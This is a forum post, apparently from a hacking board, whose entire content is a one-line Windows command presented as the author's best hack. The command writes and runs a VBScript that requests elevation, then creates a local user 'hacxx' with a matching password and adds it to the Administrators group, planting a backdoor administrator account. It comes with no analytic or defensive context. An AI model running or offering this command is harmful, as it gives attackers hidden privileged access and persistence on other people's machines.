Login Register


My best one line hack so far... filter_list
Author
Message
My best one line hack so far... #1
Code:
cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs

Reply







Users browsing this thread: 1 Guest(s)